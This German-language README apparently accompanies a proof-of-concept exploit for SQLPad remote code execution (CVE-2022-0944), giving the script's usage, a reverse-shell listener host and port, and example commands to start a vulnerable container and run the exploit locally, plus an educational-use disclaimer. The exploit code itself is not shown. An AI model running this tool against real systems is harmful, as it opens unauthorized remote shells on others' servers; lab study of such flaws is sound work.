
Ein Proof-of-Concept-Exploit für SQLPad RCE (CVE-2022-0944).
Ein Proof-of-Concept-Exploit für SQLPad RCE (CVE-2022-0944)
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
Beispiel:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
Dieses Repository enthält Code und Werkzeuge, die ausschließlich zu Bildungszwecken bestimmt sind, insbesondere für den Einsatz in Cybersecurity-Kursen und Lernumgebungen. Der Autor dieses Codes übernimmt keine Verantwortung für etwaige Konsequenzen, die sich aus der Nutzung, dem Missbrauch oder der Modifikation dieses Codes ergeben. Der Code wird "wie besehen" ohne jegliche Gewährleistung, weder ausdrücklich noch stillschweigend, bereitgestellt, einschließlich, aber nicht beschränkt auf stillschweigende Gewährleistungen der Marktgängigkeit oder der Eignung für einen bestimmten Zweck.